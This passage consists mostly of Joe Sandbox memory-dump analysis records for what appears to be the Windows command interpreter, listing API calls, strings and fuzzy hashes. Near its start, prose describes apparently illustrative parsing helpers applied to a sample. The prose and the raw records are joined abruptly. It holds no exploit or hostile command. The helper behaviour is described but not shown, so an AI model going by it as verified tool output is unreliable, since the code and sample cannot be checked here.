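• Instruction ID: ccd7cafef9c02098fd72ad3f03de88393f2d586589c48a52a10c5fc60daa8822
• Opcode Fuzzy Hash: 183dd49cd64c4b512f254b2111cbb7598a172917c7dc1c37f5ad0fa1295e0e26
• Instruction Fuzzy Hash: 7151A132A0B783AAEB619F21D8502B973A4FF49B94F144035DA4D87B96DF3CE555E300
APIs
• _wcsicmp.MSVCRT ref: 00007FF6A0E7B4BD
"""
```

`parse_records(SAMPLE)` yields one record: the truncated tail block is discarded rather than emitted half-filled, and the two "Associated" entries come back as bare dump names. `functions_calling(records, "SetErrorMode", include_subcalls=False)` is empty because that call is only reached through the callee at 00007FF6A0E83060, while `GetLastError` is a direct reference. `opcode_hash_mismatches` returns nothing, matching what every block on this page shows: the Opcode ID and the Opcode Fuzzy Hash carry the same value.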
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                          • String ID:
                                                                                          • API String ID: 2123716050-0
                                                                                          • Opcode ID: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                          • Instruction ID: 3b92ce1e7ea0f2dc4bc367535446947fa65de45b2aeed9ec81226022f30a6b59
                                                                                          • Opcode Fuzzy Hash: bbaf5dedd0cbdd4485c46577773df657aecb1a5bcd9d4c4f0a46f38ce4e38573
                                                                                          • Instruction Fuzzy Hash: 7B41903270ABC29AEB718F25D8503E967A4FB49B8DF044134DB4D8AB99DF3CD2499700
APIs
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
• String ID:
• API String ID: 3114114779-0
• Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
• Instruction ID: 4863d05a9c0cb4b22135a9edc6520b25f37b698ba00d273919510669793c5822
• Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
• Instruction Fuzzy Hash: C4411632A0AB42AAE7008F65E8802AD77A5FB88748F554136EA0D93B55DF38E416D740
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6A0E99A82), ref: 00007FF6A0E9A77A
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6A0E99A82), ref: 00007FF6A0E9A7AF
• RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6A0E99A82), ref: 00007FF6A0E9A80E
• SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6A0E99A82), ref: 00007FF6A0E9A839
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF6A0E99A82), ref: 00007FF6A0E9A850
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: QueryValue$CloseErrorLastOpen
• String ID:
• API String ID: 2240656346-0
• Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
• Instruction ID: c995cc6922be9bdc76b5add062665ee536c2f3cf7e2195d10b5f337c70460c61
• Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
• Instruction Fuzzy Hash: 00317032A1AA43A6E7608F25E44457AB7F4FF8C790F684135EA4E82764DF3CD8519B40
APIs
  • Part of subcall function 00007FF6A0E801B8: _get_osfhandle.MSVCRT ref: 00007FF6A0E801C4
  • Part of subcall function 00007FF6A0E801B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6A0E8E904,?,?,?,?,00000000,00007FF6A0E83491,?,?,?,00007FF6A0E94420), ref: 00007FF6A0E801D6
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6A0E9D0F9
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6A0E9D10F
• ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6A0E9D166
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6A0E9D17A
• SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF6A0E9D18C
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
• String ID:
• API String ID: 3008996577-0
• Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
• Instruction ID: 3aca63f90eeb57fde47cb60b04b3804da2edcefeeee7647ba401823d9c944c49
• Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
• Instruction Fuzzy Hash: 50216936B19A52DAF7009BB1E8000BD7BB0FB8DB45B545125EE1D93B98EF38D044DB14
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: CreateSemaphore
• String ID: _p0$wil
• API String ID: 1078844751-1814513734
• Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
• Instruction ID: 4b2cb0489550b5f13a7f75a44fc25666fd3243cb131acce95cce7968bfc3bfae
• Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
• Instruction Fuzzy Hash: 8451E473F1B783A6EE659F5494542B9A2A0FF84BD0F644435DA4E87784DF3CE505A300
APIs
• RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF6A0E9B934
• GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6A0E85085), ref: 00007FF6A0E9B9A5
• GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6A0E85085), ref: 00007FF6A0E9B9F7
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: Global$AllocAsciizCreateFreeFromStringUnicode
• String ID: %WINDOWS_COPYRIGHT%
• API String ID: 1103618819-1745581171
• Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
• Instruction ID: 685569fe205fe695aa1d66e422621a6f4e95e5fc90555fa8586c6f9233bda1fc
• Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
• Instruction Fuzzy Hash: 4541AD72A1A783A2EA108F1595102B9B3B0FB99BD1F958235DF9D83395EF3CE481D300
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: memset$_wcslwr
• String ID: [%s]
• API String ID: 886762496-302437576
• Opcode ID: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
• Instruction ID: 9042f15a118144b833df9698db9ae61da0df2573d327d81587afe38e7e8bbf11
• Opcode Fuzzy Hash: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
• Instruction Fuzzy Hash: AF315932706B86AAEB25CF21E8903E967A0FB8DB89F444135DE8D8B755DF3CD2458700
APIs
  • Part of subcall function 00007FF6A0E833A8: iswspace.MSVCRT(?,?,00000000,00007FF6A0E9D6EE,?,?,?,00007FF6A0E90632), ref: 00007FF6A0E833C0
• iswspace.MSVCRT(?,?,?,00007FF6A0E832A4), ref: 00007FF6A0E8331C
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: iswspace
• String ID: off
• API String ID: 2389812497-733764931
• Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
• Instruction ID: 5f608a728c66ec4e1b158936c2bd60105e0b44701e47f8f4d1171c56dfcae718
• Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
• Instruction Fuzzy Hash: 89218031E0E643A2FA649B25A51127D66A0FF89B90F588034D92EC7781DF2CE448A301
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
• Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: wcschr$Heapiswspace$AllocProcess
• String ID: %s=%s$DPATH$PATH
• API String ID: 3731854180-3148396303
• Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
• Instruction ID: b4100da367efd42e06ae6e9ca4db64a264bb8194cd8f2287079e6eeec79ab058
• Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
• Instruction Fuzzy Hash: 61218B72B0B643A2EA54DF5AE4402B9A7B0BF88BC0F984135DD0EC7795DF2CE844A350
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcscmp
                                                                                          • String ID: *.*$????????.???
                                                                                          • API String ID: 3392835482-3870530610
                                                                                          • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                          • Instruction ID: 0b7f62fc094bc8f30599c39fc0166625dd04408525ce4c0cc3b621069cf24260
                                                                                          • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                          • Instruction Fuzzy Hash: 5611A135B25AA391E7688F26B54053973A1FB88B80F1D5031DE8D97B99DF3DE481A700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: fprintf
                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                          • API String ID: 383729395-2781220306
                                                                                          • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                          • Instruction ID: af80de27ee59aba575011259b0c61b9427a89ae55bfcb8fe8829d70e86ab5c8c
                                                                                          • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                          • Instruction Fuzzy Hash: 4C11913190B643A2EA558B19E9400BAA2B1FB447F0F554332D67D833E4EF2CE885A340
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: iswspacewcschr
                                                                                          • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                          • API String ID: 287713880-1183017076
                                                                                          • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                          • Instruction ID: 2696317d1d78fe5c4ff2287c67e83b8cc7db43652a81909c36ae0990c28fce1e
                                                                                          • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                          • Instruction Fuzzy Hash: F0F06231A1E753E5FAA88B51F44017A66A0FF49F41F5A9171E95E83354EF3CE448E700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                          • API String ID: 1646373207-2530943252
                                                                                          • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                          • Instruction ID: b4680fef0a0bf5ad54f845cca5b948aeeffa19617cbc17076925ba65af1da2fb
                                                                                          • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                          • Instruction Fuzzy Hash: DF01C4B1E0BB47A5EA948B11A89117462A0FF59731F644736E53E827E0DE2CA585A700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: RaiseFailFastException$kernelbase.dll
                                                                                          • API String ID: 1646373207-919018592
                                                                                          • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                          • Instruction ID: a2e57f43a823ca3a0a14d3f9f933a825e511193cff4756efc9b5f42e2bcb9066
                                                                                          • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                          • Instruction Fuzzy Hash: A0F0DA72B19B92A2EA049F12F44407AAA70FF8DBD1B589535EA4E57B14CF3CD485D700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$CurrentDirectorytowupper
                                                                                          • String ID:
                                                                                          • API String ID: 1403193329-0
                                                                                          • Opcode ID: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                                                          • Instruction ID: ef9e8c26b70dac525d2a4504607187ba90ea64991b8fa6f853c1e6b0b6bdf147
                                                                                          • Opcode Fuzzy Hash: 8f12ec0cfcd936a987ebeb0b3721ecca5b9c81898bdfe4a19f372ac06b3fdf31
                                                                                          • Instruction Fuzzy Hash: F261CE32A0AB839AFB20CB65D8402ED37A4FB88748F544134DE5D93B9AEF38E454D700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsnicmp$wcschr
                                                                                          • String ID:
                                                                                          • API String ID: 3270668897-0
                                                                                          • Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                          • Instruction ID: 57c801af657e5d6b63035319b06628ff3daebfc14f27305fe8774c6d3f1c47e8
                                                                                          • Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                                                                          • Instruction Fuzzy Hash: 4C51BF71E0E643A1FB61AF25E4201B963A1FF85B80F588071DA4E873D6DF2CE949E350
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memset$DriveFullNamePathType
                                                                                          • String ID:
                                                                                          • API String ID: 3442494845-0
